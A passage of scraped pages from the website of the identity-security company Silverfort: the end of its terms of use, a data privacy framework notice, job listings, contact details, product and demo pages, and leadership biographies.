ANY THIRD PARTY THAT MAY RESULT FROM TECHNICAL PROBLEMS OF THE INTERNET, SLOW CONNECTIONS, TRAFFIC CONGESTION OR OVERLOAD OF OUR OR OTHER SERVERS. WE DO NOT WARRANT, ENDORSE OR GUARANTEE ANY CONTENT, PRODUCT, OR SERVICE THAT IS FEATURED OR ADVERTISED ON THE SITE BY A THIRD PARTY. 10. 3 YOUR RELIANCE ON, OR USE OF, ANY USER SUBMISSION, OR INTERACTION WITH ANY SITE USER OR OWNER, IS AT YOUR SOLE RISK. IF YOU HAVE A DISPUTE WITH ANY SITE USER OR OWNER IN CONNECTION WITH THE SITE OR ANY USER SUBMISSION, YOU AGREE THAT SILVERFORT IS NOT LIABLE FOR ANY CLAIMS OR DAMAGES ARISING OUT OF OR CONNECTED WITH SUCH A DISPUTE. SILVERFORT RESERVES THE RIGHT, BUT HAS NO OBLIGATION, TO MONITOR ANY SUCH DISPUTE. 10. 4 EXCEPT AS EXPRESSLY STATED IN OUR PRIVACY POLICY, SILVERFORT DOES NOT MAKE ANY REPRESENTATIONS, WARRANTIES OR CONDITIONS OF ANY KIND, EXPRESS OR IMPLIED, AS TO THE SECURITY OF ANY INFORMATION YOU MAY PROVIDE OR ACTIVITIES YOU ENGAGE IN DURING THE COURSE OF YOUR USE OF THE SITE. Limitation of Liability. 11. 1 TO THE FULLEST EXTENT PERMISSIBLE BY LAW, SILVERFORT SHALL NOT BE LIABLE FOR ANY DIRECT, INDIRECT, EXEMPLARY, SPECIAL, CONSEQUENTIAL, OR INCIDENTAL DAMAGES OF ANY KIND, OR FOR ANY LOSS OF DATA, REVENUE, PROFITS OR REPUTATION, ARISING UNDER THESE TERMS OR OUT OF YOUR USE OF, OR INABILITY TO USE, THE SITE, EVEN IF SILVERFORT HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES OR LOSSES. Some jurisdictions do not allow the limitation or exclusion of liability for incidental or consequential damages, so the above limitations may not apply to you. 11. 2 IN NO EVENT SHALL THE AGGREGATE LIABILITY OF SILVERFORT FOR ANY DAMAGES ARISING UNDER THESE TERMS OR OUT OF YOUR USE OF, OR INABILITY TO USE, THE SITE EXCEED THE TOTAL AMOUNT OF FEES, IF ANY, PAID BY YOU TO SILVERFORT FOR USING THE SITE DURING THE THREE (3) MONTHS PRIOR TO BRINGING THE CLAIM. Indemnity. You agree to defend, indemnify and hold harmless Silverfort and our affiliates, and our respective officers, directors, employees and agents, from and against any and all claims, damages, obligations, losses, liabilities, costs and expenses (including but not limited to attorney’s fees) arising from: (i) your use of, or inability to use, the Site; (ii) your User Submissions; (iii) your interaction with any Site user; or (iv) your violation of these Terms. Term and Termination. These Terms are effective until terminated by Silverfort or you. Silverfort, in its sole discretion, has the right to terminate these Terms and/or your access to the Site, or any part thereof, immediately at any time and with or without cause (including, without any limitation, for a breach of these Terms). Silverfort shall not be liable to you or any third party for termination of the Site, or any part thereof. If you object to any term or condition of these Terms, or any subsequent modifications thereto, or become dissatisfied with the Site in any way, your only recourse is to immediately discontinue use of the Site. Upon termination of these Terms, you shall cease all use of the Site. This Section ‎13 and Sections ‎6 (Intellectual Property Rights), ‎9 (Privacy), ‎10 (Warranty Disclaimers), ‎11 (Limitation of Liability), ‎12 (Indemnity), and ‎14 (Independent Contractors) to ‎17 (General) shall survive termination of these Terms. Independent Contractors. You and Silverfort are independent contractors. Nothing in these Terms creates a partnership, joint venture, agency, or employment relationship between you and Silverfort. You must not under any circumstances make, or undertake, any warranties, representations, commitments or obligations on behalf of Silverfort. Assignment. These Terms, and any rights and licenses granted hereunder, may not be transferred or assigned by you but may be assigned by Silverfort without restriction or notification to you. Any prohibited assignment shall be null and void. Governing Law. Silverfort reserves the right to discontinue or modify any aspect of the Site at any time. These Terms and the relationship between you and Silverfort shall be governed by and construed in accordance with the laws of the State of New York, without regard to its principles of conflict of laws, and only the courts in New York County, New York, shall have jurisdiction in any conflict or dispute arising out of these Terms. General. These Terms shall constitute the entire agreement between you and Silverfort concerning the Site. If any provision of these Terms is deemed invalid by a court of competent jurisdiction, the invalidity of such provision shall not affect the validity of the remaining provisions of these Terms, which shall remain in full force and effect. No waiver of any term of these Terms shall be deemed a further or continuing waiver of such term or any other term, and a party’s failure to assert any right or provision under these Terms shall not constitute a waiver of such right or provision. YOU AGREE THAT ANY CAUSE OF ACTION THAT YOU MAY HAVE ARISING OUT OF OR RELATED TO THE SITE MUST COMMENCE WITHIN ONE (1) YEAR AFTER THE CAUSE OF ACTION ACCRUES. OTHERWISE, SUCH CAUSE OF ACTION IS PERMANENTLY BARRED. Last updated: July 25, 2018. --- - Published: 2022-03-30 - Modified: 2025-08-21 - URL: https://www.silverfort.com/silverfort-dpf-notice/ Effective: September, 2024 This DPF notice (“Notice”) governs Silverfort Inc. (“Silverfort”, “We” or “Our”) participation in the EU-U. S. DPF and the UK Extension to the EU-U. S. DPF, and the Swiss-U. S. DPF programs with respect to the Processing of Personal Data as further explained in Section 1 below.   If there is any conflict between the terms in this Notice and the DPF principles, the DPF principles shall govern.  To learn more about the DPF and its principles please visit https://www. dataprivacyframework. gov/s/. “Personal Data” means any information relating to an identified or identifiable natural person; an identifiable natural person is one who can be identified, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person. “Process”, “Processing” means any operation or set of operations which is performed on Personal Data or on sets of Personal Data, whether or not by automated means, such as collection, recording, organization, structuring, storage, adaptation or alteration, retrieval, consultation, use, disclosure by transmission, dissemination or otherwise making available, alignment or combination, restriction, erasure or destruction. 1. SCOPE. Silverfort’s participation in the DPF applies to non-HR Personal Data that is subject to the EU, UK, and Swiss data protection laws that Silverfort receives in the context of the provision of Silverfort's Services (as defined below) including, from customers, Silverfort's affiliates or other third parties. 2. PURPOSES OF DATA PROCESSING. Silverfort complies with the principles of the EU-U. S. DPF (and the UK Extension to the EU-U. S. DPF) and the Swiss-U. S. DPF regarding the collection, use, and retention of Personal Data transferred to the United States from the European Union, United Kingdom, and Switzerland. Our program covers transfers of Personal Data in the following cases: (i) to provide Silverfort’s services; (ii) for Silverfort’s customers to be able to use Silverfort’s services; and/or (iii) to comply with other documented reasonable instructions provided Silverfort’s customers (the “Service”). The categories of Personal Data collected and Processed by Silverfort, include, without limitation: Full name; username / log-in details; email address; title / job position; IP address; User ID (random number generated by the Services); handling orders; delivering products and services; processing payments; communicating with customers, users, vendors, and sellers about orders, products, services and promotional offers; and/or any other Personal Data or information that the Silverfort’s customers provide or instruct Silverfort to Process in the context of Silverfort’s Services. Silverfort has certified to the DoC that it adheres to the DPF Principles and Our DPF certification is available here. 3. ONWARD TRANSFERS OF PERSONAL DATA. 3. 1. We will not transfer Personal Data originating in the EU, UK, and/or Switzerland to third parties unless such third parties have entered into an agreement in writing with us requiring them to provide at least the same level of protection to the Personal Data as required by the Principles of the EU-U. S. DPF (and the UK Extension to the EU-U. S. DPF) and the Swiss-U. S. DPF. We transfer Personal Data to processors, service providers, vendors, contractors, partners and agents (collectively "Processors") who need the information in order to provide services to or perform activities on Our behalf. We are responsible for such onward transfers to third pursuant to the EU-U. S. DPF (and the UK Extension to the EU-U. S. DPF) and the Swiss-U. S. DPF. The abovementioned Processors and the description of the services that they provide and/or the activities that they perform are set out in the table below: Processor's Purpose On-demand cloud computing platforms including digital user experience cloud-based platform and cloud-based customer support services. User log-in tools. Customer communication platform for transactional and email provider. CRM platformSupport platform 3. 2. To the extent necessary, with regulators, courts or competent authorities, to comply with applicable laws, regulations and rules (including, without limitation, federal, state or local laws), and requests of law enforcement, regulatory and other public or governmental agencies, or if required to do so by court order (including to meet national security or law enforcement requirement); 3. 3. If, in the future, we sell or transfer, or we consider selling or transferring, some or all of our business, shares or assets to a third party, we will disclose your Personal Data to such third party (whether actual or potential) in connection with the foregoing events; 3. 4. In the event that we are acquired by, or merged with, a third party entity, or in the event of bankruptcy or a comparable event, we reserve the right to transfer, disclose or assign your Personal Data in connection with the foregoing events, including, in connection with, or during negotiations of, any merger, sale of company assets, consolidation or restructuring, financing, or acquisition of all or a portion of our business by or to another company; and/or 3. 5. Where you have provided your consent to us sharing or transferring your Personal Data. 4. DATA SUBJECT RIGHTS You have the right to access Personal Data about you, and in some cases you are also allowed to correct, amend, or delete that Personal Data where it is inaccurate, or has been processed in violation of the DPF principles. In addition, you have the choice to limit the use and disclosure of your Personal Data. If you believe that We are Processing your Personal Data within the scope of Our DPF program, you can submit your request to: privacy@silverfort. com. Please be aware that in specific situations where fulfilling access or other requests might impose a disproportionate burden or expense, or potentially infringe upon the rights of others, we may be required to carefully review and, if permissible under applicable law, respectfully decline your request. 5. INDEPENDENT RECOURSE MECHANISM. ARBITRATION. 5. 1. In compliance with the EU-U. S. DPF (and the UK Extension to the EU-U. S. DPF) and the Swiss-U. S. DPF, Silverfort, Inc. commits to resolve DPF Principles-related complaints about our collection and use of your personal information. EU, UK and Swiss individuals with inquiries or complaints regarding our handling of personal data received in reliance on the EU-U. S. DPF (and the UK Extension to the EU-U. S. DPF) and the Swiss-U. S. DPF should first contact Silverfort, Inc. at privacy@silverfort. com or by postal mail sent to: Silverfort, Inc. Attn: DPF Inquiry43 Westland Avenue. Boston, MA 02115USA Silverfort has further committed to refer unresolved privacy complaints under the EU-U. S. DPF (and the UK Extension to the EU-U. S. DPF) and theSwiss-U. S. DPF to JAMS, a non-profit alternative dispute resolution provider located in the United States to assist with the complaint resolution process. If you do not receive timely acknowledgment of your complaint, or if your complaint is not satisfactorily addressed, please visit https://www. jamsadr. com/dpf-dispute-resolution for more information and to file a complaint. The services of JAMS are provided at no cost to you. 5. 2. Under certain conditions, more fully described on the DPF website (available here), you may also be able to invoke binding arbitration to determine whether a participating organization has violated its obligations under the DPF principles as to that individual and whether any such violation remains fully or partially unremedied (“residual claims”) after you approached us and you used the independent recourse mechanism. The International Centre for Dispute Resolution-American Arbitration Association (“ICDR-AAA”) was selected by the U. S. Department of Commerce to administer arbitrations pursuant to and manage the arbitral fund. Please visit ICDR-AAA’s website for more information. 6. U. S. FEDERAL TRADE COMMISSION ENFORCEMENT. Silverfort is subject to the investigatory and enforcement powers of the Federal Trade Commission ("FTC") to ensure compliance with the EU-U. S. DPF (and the UK Extension to the EU-U. S. DPF) and the Swiss-U. S. DPF outlined in this DPF Notice. --- - Published: 2022-03-28 - Modified: 2025-03-03 - URL: https://www.silverfort.com/careers/ Careers with Silverfort Join our team. We’re always looking for the best talent to join our award-winning team. Discover what it’s like to work at Silverfort and browse open job opportunities here. Browse our open job roles #1 BEST start-up to work for in Israel for the third year in a row! according to Dun & Bradstreet 2022, 2023 & 2024 Perks and benefits Always for your benefit. We offer a huge range of perks and benefits to our people, and we’re always looking for new ways to make working at Silverfort special. Some benefits may vary by country. Silverfort Care & Wellness Employees’ wellbeing matters, which is why we reimburse up to $100 USD monthly for personal care and wellness. Stock Options Plan All permanent employees receive stock options since they are fundamental to our success. Quarterly Recharge Days In addition to your annual leave, we have quarterly recharge days so our entire team can enjoy a long weekend. Volunteering initiatives We believe in giving back, and offer paid leave to volunteer for a cause or charity of your choice. Company events We host the best parties, QBRs, SKOs and more. Check out our photos to see some of the fun we’ve had together over the years. Personal Development Learn new skills and tools with our quarterly workshops and personalized development programs. Browse our open job opportunities Open Positions If you can’t find the right role below, send your resume to jobs@silverfort. com and we’ll be in touch if a future opening looks like a good fit for you. All departmentsSalesCustomer Success & SupportStrategyMarketingFinance and LegalProductR&DCTOHRAll locationsUnited StatesTel Aviv, IsraelStockholm, SwedenMunich, Germany Sales Channel Account Manager- South East United States DescriptionSilverfort is a cyber-security company that develops a revolutionary identity protection platform. Using patented technology, our product enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. In addition, we use advanced behavior analytics to apply adaptive authentication policies and prevent cyber-attacks in real time. Our mission is to provide industry-leading unified identity protection solutions for hybrid and multi-cloud environments. We develop cutting-edge cybersecurity technology that solves urgent customer needs today and is also a game changer for years to come. Silverfort’s team includes exceptional researchers, engineers, and technology experts who successfully tackle some of the most complex challenges in cyber-security. Silverfort has happy customers worldwide, strong market validation (including several industry awards), strategic partnerships with the largest security vendors in the world, and significant funding from leading VCs.  The Channel Account Manager will generate new business through building a reseller, referral partner, and distributor network. The Channel Account Manager will be tasked with executing on all aspects of the business relationship with each partner including recruiting, qualifying, onboarding, training, pipeline generation and reporting, and win/loss reporting. ResponsibilitiesWork closely with the Account Executives in the South East area to identify the focus partnersBuild the Go To Market business plans with the identified focus partnersAlign the sales organization through targeted demand generation and alignment activitiesDrive resources to provide enablement activities at both the Sales and SE levelsProvide executive alignment with partner stakeholdersAlign yourself internally with Enterprise, Commercial Sales and Sales Leadership to drive toward a common goalAccurate forecasting partner opportunities in conjunction with the direct sales teamsBuild marketing plans and manage a budget for the regionCoordinate and collaborate with cross-functional teams (including SE organization, product marketing, sales, marketing, operations and legal) to deliver a world class experience for the partnerHold the partners and the stakeholders accountable to agreed-upon goalsProactively maintain ongoing knowledge of industry, global markets, existing and target channel partner accounts & competitive landscapePossess an in-depth knowledge of each strategic partner’s business and what drives their successRequirementsAt least 5 years of proven success in Channel or Technology SalesExperience in Security and/or Identity technologiesSkilled at strategizing with large partnersProven track record of achieving and exceeding sales quota targetsStrategic mindset to drive the partner lifecycle, including recruitment, enablement, pipeline, revenue, marketingProven ability to communicate with partners at all levels within an organizationDemonstrates thorough preparation for all partner meetings and activitiesProven success with sales ability and demonstrated knowledge of sales processExcellent presentation skillsWillingness to go above and beyond the job description to be successfulBA/BS degree- an advantageTeam OrientedOpen to travel-40%We prefer candidates in Atlanta, Florida, or Washington DC area Apply now Regional Sales Manager - Nordics Stockholm, Sweden DescriptionSilverfort is a cyber-security startup that develops a revolutionary identity protection platform. Our mission is to provide industry-leading unified identity protection solutions for hybrid and multi-cloud environments. Using patented technology, Silverfort’s platform enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers.  Silverfort has been widely recognized as an industry innovator, being named “Best of MFA award” from Expert Insights, Microsoft Security 20/20 partner award, Homeland Security Award for Best Identity Access Management platform for its agentless secure authentication and zero trust platform by Astors. We are looking for a hungry, hunter-at-heart, Regional Sales Manager superstar to join our rapidly growing company and help boost our client-base across the Nordics Region. ResponsibilitiesExecute on the entire sales cycle end-to-end: create and qualify leads and pipeline, manage high-quality C-level customer meetings, oversee POCs, perform key account management, negotiate and close Establish and maintain direct relationships with C-level executives in target end-customer accounts as well as in key channel partners Develop and execute comprehensive business plans for strategic accounts, become a trusted advisor for prospects, evangelize value propositions on an expert-level Capture, reflect and maintain sales forecast diligently in SFDC Collaborate with presale, product, marketing and customer success teams to maximize overall customer satisfaction Meet/exceed sales quota Requirements6+ years of B2B sales experience overall, out of which 3+ years in direct sales of cybersecurity or IAM software solutions to medium and large enterprises Proven track record of consistently meeting/overachieving sales quotas Experience in working closely and collaboratively with channel partners Pro-active, hungry, self-driven individual, with a whatever-it-takes attitude Passionate about innovative technology and about winning customers’ hearts and minds Outstanding communication skills, comfortable presenting to C-level executives and technical leads alike Experience in selling technical products of startup-stage vendors- a significant advantage Apply now Regional Sales Manager DACH Munich, Germany DescriptionSilverfort is a cyber-security startup that develops a revolutionary identity protection platform. Our mission is to provide industry-leading unified identity protection solutions for hybrid and multi-cloud environments. Using patented technology, Silverfort’s platform enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers.  Silverfort has been widely recognized as an industry innovator, being named “Best of MFA award” from Expert Insights, Microsoft Security 20/20 partner award, Homeland Security Award for Best Identity Access Management platform for its agentless secure authentication and zero trust platform by Astors. We are looking for a hungry, hunter-at-heart, Sales Manager superstar to join our rapidly growing company and help boost our client-base across the DACH Region. ResponsibilitiesExecute on the entire sales cycle end-to-end: create and qualify leads and pipeline, independently present and demo to end customers, oversee POCs, negotiate and closeEstablish and maintain direct relationships with relevant decision-makers in target end-customer accountsEstablish and maintain direct relationships with key channel partners in support of full channel partner enablementCapture, reflect and maintain sales forecast diligently and accurately in SFDCCollaborate with presale, product, marketing, and customer success teams to maximize overall customer satisfactionMeet/exceed sales quotaRequirements5+ years of experience selling software to end customers, with two tier channels in cybersecurity vendors or resellersExperience selling to customers in the DACH RegionCoachable and open to constructive feedbackProven track record of consistently meeting/overachieving sales quotasPro-active, hungry, self-driven with a whatever-it-takes attitudePassionate about innovative technologyPassionate about sales and invests in continuous learning and improvingOutstanding communication skills, comfortable with both presenting to C-level executives and demoing to technical stakeholdersExperience in selling technical products of startup-stage vendors - an advantage High Level of English and German - a must Apply now Renewals Manager - EMEA Munich, Germany DescriptionSilverfort is a cyber-security company that has developed a revolutionary identity protection platform. Our mission is to provide industry-leading Unified Identity Protection solutions for hybrid and multi-cloud environments. Using patented technology, Silverfort’s platform enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers.  Silverfort has been widely recognized as an industry innovator, being named “Best of MFA award” from Expert Insights, Microsoft Security 20/20 partner award, Homeland Security Award for Best Identity Access Management platform for its agentless secure authentication and zero trust platform by Astors.  As a Renewal Manager, you will be responsible for overseeing our customer account contracts for Silverfort’s EMEA Territories. This includes communicating directly with customers, resellers, distributors, and internal colleagues to ensure the timely and accurate execution of customer renewals as well as helping our customers expand their Silverfort footprint. As part of our industry-leading organization, you will also be responsible for managing account-related tasks rooted in maximizing customer value and investment.  ResponsibilitiesNegotiate value-driven renewals and contract changes while ensuring a world-class customer experience Utilize business development skills to execute product expansion opportunities in collaboration with Customer Success and Sales teams Work collaboratively with customers, resellers, and internal stakeholders to grow accounts and drive incremental opportunities Establish rapport and solid working relationships with your customers Lead internal forecasting discussions and pipeline reviews Contribute to the success of the company by providing feedback and influencing new processes and playbooks Requirements3-4 years of Renewal experience in the Tech Industry Possess sales or negotiation experience Show clear communication skills with the ability to lead a conversation effectively Must be passionate about creating a great customer experience Possess prioritization and organizational skills with attention to detail Thrive in a dynamic and passionate environment Invest in relationships with customers and colleagues Seek to understand multiple perspectives in a situation Contribute to a positive team environment Working knowledge of Salesforce, CPQ, Microsoft Suite (PPTX, Word, Excel)High level of spoken and written English and German - a mustAbility to work on Fridays Apply now Renewals Manager - EMEA Tel Aviv, Israel DescriptionSilverfort is a cyber-security company that has developed a revolutionary identity protection platform. Our mission is to provide industry-leading Unified Identity Protection solutions for hybrid and multi-cloud environments. Using patented technology, Silverfort’s platform enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers.  Silverfort has been widely recognized as an industry innovator, being named “Best of MFA award” from Expert Insights, Microsoft Security 20/20 partner award, Homeland Security Award for Best Identity Access Management platform for its agentless secure authentication and zero trust platform by Astors.  As a Renewal Manager, you will be responsible for overseeing our customer account contracts for Silverfort’s EMEA Territories. This includes communicating directly with customers, resellers, distributors, and internal colleagues to ensure the timely and accurate execution of customer renewals as well as helping our customers expand their Silverfort footprint. As part of our industry-leading organization, you will also be responsible for managing account-related tasks rooted in maximizing customer value and investment.  ResponsibilitiesNegotiate value-driven renewals and contract changes while ensuring a world-class customer experience Utilize business development skills to execute product expansion opportunities in collaboration with Customer Success and Sales teams Work collaboratively with customers, resellers, and internal stakeholders to grow accounts and drive incremental opportunities Establish rapport and solid working relationships with your customers Lead internal forecasting discussions and pipeline reviews Contribute to the success of the company by providing feedback and influencing new processes and playbooks Requirements3-4 years of Renewal experience in the Tech Industry Possess sales or negotiation experience Show clear communication skills with the ability to lead a conversation effectively Must be passionate about creating a great customer experience Possess prioritization and organizational skills with attention to detail Thrive in a dynamic and passionate environment Invest in relationships with customers and colleagues Seek to understand multiple perspectives in a situation Contribute to a positive team environment Working knowledge of Salesforce, CPQ, Microsoft Suite (PPTX, Word, Excel)High level of spoken and written English and German - a mustAbility to work on Fridays Apply now Customer Success & Support Commercial Customer Success Manager United States DescriptionSilverfort is a cyber security startup that develops a revolutionary identity protection platform. Our mission is to provide industry leading unified identity protection solutions for hybrid and multicloud environments. Using patented technology, Silverfort’s... --- - Published: 2022-03-24 - Modified: 2025-08-26 - URL: https://www.silverfort.com/contact/ contact us Let's connect We're here to help. Talk to sales Looking for a complete end-to-end identity security solution? You’ve come to the right place. Get a demo for a complete guided tour of our platform. Get a demo Become a partner Our partner network includes leading value-added distributors and resellers, advisory consultants, global system integrators, and tech partners. Contact us to learn more. Register here Get support Already a customer? Raise a support ticket in our Customer Support Portal. If you do not have access to the portal, email support@silverfort. com. Contact support Locations United States: HQ 5525 Granite Parkway, Plano, Texas 75024, United States(+1) 202. 688. 3098 Australia Sydney Level 16, 175 Pitt St, Sydney, NSW 2000 Melbourne Level 4–5, 447 Collins Street, Melbourne VIC 3000 Germany Theodor-Stern-Kai 1, 60596 Frankfurt am Main, Germany Israel 2 Leonardo da Vinci St. , 40th Floor, Landmark TLV Tower, Tel Aviv-Yafo, 6473309 Israel Japan Gran Tokyo South Tower 9th fl, 1-9-2 Marunouchi, Chiyoda ku, Tokyo 100-6611 jpinfo@silverfort. com Singapore 176 Orchard Road, The Centrepoint, #05-05, Singapore 238843 Work with us We’re always looking for the best talent to join our award-winning team. Discover what it’s like to work at Silverfort and browse open job opportunities here. Join the team --- - Published: 2022-03-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/use-cases/securing-service-accounts/ Discover, monitor and protect service accounts (M2M access) with fully automated visibility, risk analysis and adaptive Zero Trust policies, without requiring password rotation. Request a demo https://www. silverfort. com/wp-content/uploads/2024/09/Service-Accounts_lowres. mp4 Automated Discovery & Monitoring Gain automatic and comprehensive visibility into all your service accounts and non-human identities, including the ones you’re not aware of, as well as real-time insights into their activity and risk level. Proactive Threat Prevention Place a virtual perimeter around your service accounts with ready-to-use Zero Trust access policies tailored to each account’s behavior to prevent threat actors from using them in lateral movement attacks. No Password Rotation Protect your service accounts completely and at scale without the operational concerns of unknown dependencies and the breaking of mission-critical processes that comes from password rotation. Watch demo video Discover all your service accounts Automated AI-based discovery of all accounts with machine-like behavior, as well as typical service account attributes and naming conventions. Complete visibility into all service accounts and real-time insights into their sources, destinations, authentication protocols, and activity volume. Discover accounts that are being shared by both human users and services. Monitor service account activity and risk Monitor service account activity continuously in real time. Track the usage patterns, access requests and behavior of each service account, including high-level permissions, broad use, and repetitive behavior. High-precision anomaly detection which alerts of any deviation from the service account’s standard behavior. Analyze all service account activity Assess the risk of every authentication attempt and detect any suspicious behaviors or anomalies. Utilize enriched contextual data and risk scoring for each service account. Provide SOC teams with logs and actionable insights into overall service account activity. Evaluate service account policies Silverfort automatically suggests a tailor-made policy for each service account based on its behavioral pattern. Build out custom policies to fine-tune and adjust protection as needed. Customers can start with alerting mode and gradually advance to full protection. "Service accounts are a security nightmare because you can’t put MFA on them. Silverfort was able to protect what no one else can, including our service accounts. Of the security tools that we use, Silverfort has a very high return on investment. " Tom Parker | VP of IT & CISO Customer Challenge Kayak struggled to find a solution that could extend identity security controls over their entire environment, particularly their critical applications that use LDAP and their service accounts. Silverfort Solution Silverfort enabled Kayak to put real-time protection on service accounts by enforcing policies that block any access that deviated from normal behavior. Because of this, even if attackers could compromise the credentials of their service accounts, they would not be able to use them for malicious access. Learn more View more --- - Published: 2022-03-18 - Modified: 2025-08-18 - URL: https://www.silverfort.com/request-a-demo/ Secure every identity. Stop identity threats—inline. We found a way. From legacy to cloud, discover and protect every identity. See how Silverfort: Finds and protects service accounts & NHIs Contains attackers, reduces IR times & cost Secures your Active Directory Helps you securely innovate and adopt AI Book your demo We did a demo and POC and our jaws dropped. We wondered where this has been all our lives. We knew we needed Silverfort. Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson Silverfort was able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Tom Parker VP of IT & CISO | Kayak Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. William Woo Group CIO | Singtel Rated 4. 8 on Gartner Peer Insights We did a demo and our jaws dropped We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed Silverfort to fit our identity security needs. Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson Silverfort was able to protect what no one else can There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. " Tom Parker VP of IT & CISO | Kayak No system modifications, saving time and money "Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. " William Woo Group CIO | Singtel Rated 4. 8 on Gartner Peer Insights Book a demo See Silverfort in action Recognized by the industry Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Recognized by the industry Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Fast Company's Most Innovative Companies 2025 Fortune Top 50 Cybersecurity Companies 2025 2024 Microsoft Partner of the year Why choose the Silverfort Identity Security Platform 10B Authentications analyzed and protected everyday. 34K Real identity exposures & threats detected on average per customer. 17x Faster deployment compared to traditional solutions on average. Convinced yet? Let's chat. Book your demo --- - Published: 2022-03-15 - Modified: 2025-07-11 - URL: https://www.silverfort.com/company/ About Us Taking identity security where it has never gone before. Silverfort secures every dimension of identity. We break down the silos of identity infrastructure and point solutions to eliminate security gaps and blind spots once and for all. The result? Identity security without limits—that doesn't slow down the business. Discover our story “Identity has become the weakest link in enterprise security, and solving it requires a new approach – a unified, end-to-end layer of security that covers all the silos and blind spots of the identity infrastructure. Thanks to the trust of organizations around the world, we found a way to solve it. ” Hed Kovetz CEO & Co-Founder | Silverfort Our story What if you could make identity security work for you? We found a way. When it comes to cybersecurity, identity isn’t just a feature—it’s the most critical element to your success. For too long, enterprises have settled for isolated identity and access management (IAM) solutions and security patchworks that leave them exposed. Founded in 2016, Silverfort set out to take identity security where it has never gone before. With identity security as our sole focus and mission, we found a way to protect every identity, whether it’s in the cloud or on-prem, human or machine. Fueled by a belief that identity professionals deserve better, Silverfort breaks down the silos of identity security, eliminating the gaps and blind spots that make them vulnerable. Going far beyond any other solution, the Silverfort Identity Security Platform protects all identities, all resources and all environments, all the time. Silverfort is the only platform that truly goes everywhere to deliver unparalleled protection, context and visibility—all in a single platform. This is identity security done right. Recognized by the industry Fast Company's Most Innovative Companies 2025 Ranked 4. 8 Gartner Peer Insights #1 best start up to work for in Israel 2024 Microsoft Partner of the year Great Place to Work certified 2024-2025 Fast Company's Most Innovative Companies 2025 Ranked 4. 8 Gartner Peer Insights #1 best start up to work for in Israel 2024 Microsoft Partner of the year Great Place to Work certified 2024-2025 Team Silverfort Meet the pioneers transforming identity security. Hed Kovetz CEO, Co-Founder Hed serves as Silverfort’s CEO and is one of the company’s Co-Founders. He brings a unique technical and leadership background, including product leadership roles at Verint. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL. B. from Tel Aviv University. Yaron Kassner CTO, Co-Founder Yaron is the co-founder and Chief Technology Officer at Silverfort. Before co-founding Silverfort, Yaron did machine learning projects for Microsoft as an intern, and later Cisco as a consultant. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team and received a prestigious excellence award. Yaron holds a B. Sc. in Applied Mathematics, Summa Cum Laude, from Bar-Ilan University, and a Ph. D. in Computer Science from the Technion – Israel Institute of Technology. Matan Fattal Co-Founder Matan is one of Silverfort’s Co-Founders. Before co-founding Silverfort, he was part of the innovation R&D team at Intucell (acquired by Cisco), where he built real-time large scale products. Prior to that, Matan worked as a Software Engineer at Intel. Matan also served at the 8200 elite cyber unit of the Israel Defense Forces as a cybersecurity and big data researcher and received the unit’s excellence award. Matan holds a B. Sc. and completed his studies for M. Sc. in Mathematics at Bar-Ilan University. Revital Aronis SVP Product Management Revital oversees the continual evolution of Silverfort’s Identity Security platform. Starting her career at Israel’s elite 8200 Unit, and previously at Illusive Networks, her 15 years’ experience will help the company continually augment the platform to help customers address identity security risks using innovative technology. Tarah Cammett CMO Tarah is responsible for marketing growth, demand generation, brand and industry awareness as Chief Marketing Officer. For the past 22 years she has held key leadership positions in enterprise software and cyber security corporations and most recently was awarded one of the Top 25 Female Leaders in Cybersecurity. Prior to Silverfort, Tarah held senior marketing leadership positions at Immersive Labs, VoltDB, Carbon Black and Compuware. She holds a Bachelor of Science degree in human services and psychology from Lesley University. Liat Gavrieli Shwartz SVP HR Liat leads Silverfort’s Human Resources. Liat brings many years of experience as HR and global talent recruitment for dynamic hi-tech companies. Prior to joining Silverfort, Liat was the Director of HR at Fyber. She led the HR team from their early stages as a start-up to a public company. Liat holds a BA in Behavioral Science, Rectors’ Honors Graduate and MA in Organizational Consulting from Bar Ilan University. Howard Greenfield President & CRO As President and CRO at Silverfort, Howard leads Silverfort's GTM strategy and execution and oversees sales and marketing. Before joining Silverfort in June 2025, Howard was an Operating Partner at venture capital firm Canaan. Prior to that, he was CRO at Centrify, a Privileged Access Management (PAM) provider now known as Delinea, where he led the sales, marketing, partner and customer success teams. Earlier, Greenfield was the CRO at SailPoint, one of the world’s leading identity companies, where he was instrumental in rapidly growing ARR and positioning the company for a successful IPO in 2017. Ben Livne SVP R&D As VP of R&D, Ben leads Silverfort’s engineering innovation and development efforts. He brings more than two decades of extensive experience in various engineering roles, with a deep technical background and leadership in cutting-edge technology companies. Prior to that Ben served at the MAMRAM elite technology unit of the Israel Defense Forces as a team leader and architect, and received the unit’s excellence award. Ben holds a B. Sc. in Computer Science from the College of Management, Academic Studies. Irena Meadan CFO Irena is a finance and business professional with extensive and diversified experience in economics, corporate finance, risk and business management in both international organizations and start-up companies. Prior to joining Silverfort, Irena held various finance, consulting and business development management roles at Allot Communications, Hedgewiz, Financial Immunities, AIG and Bank of Israel, leading international teams to excellence and success. Irena holds 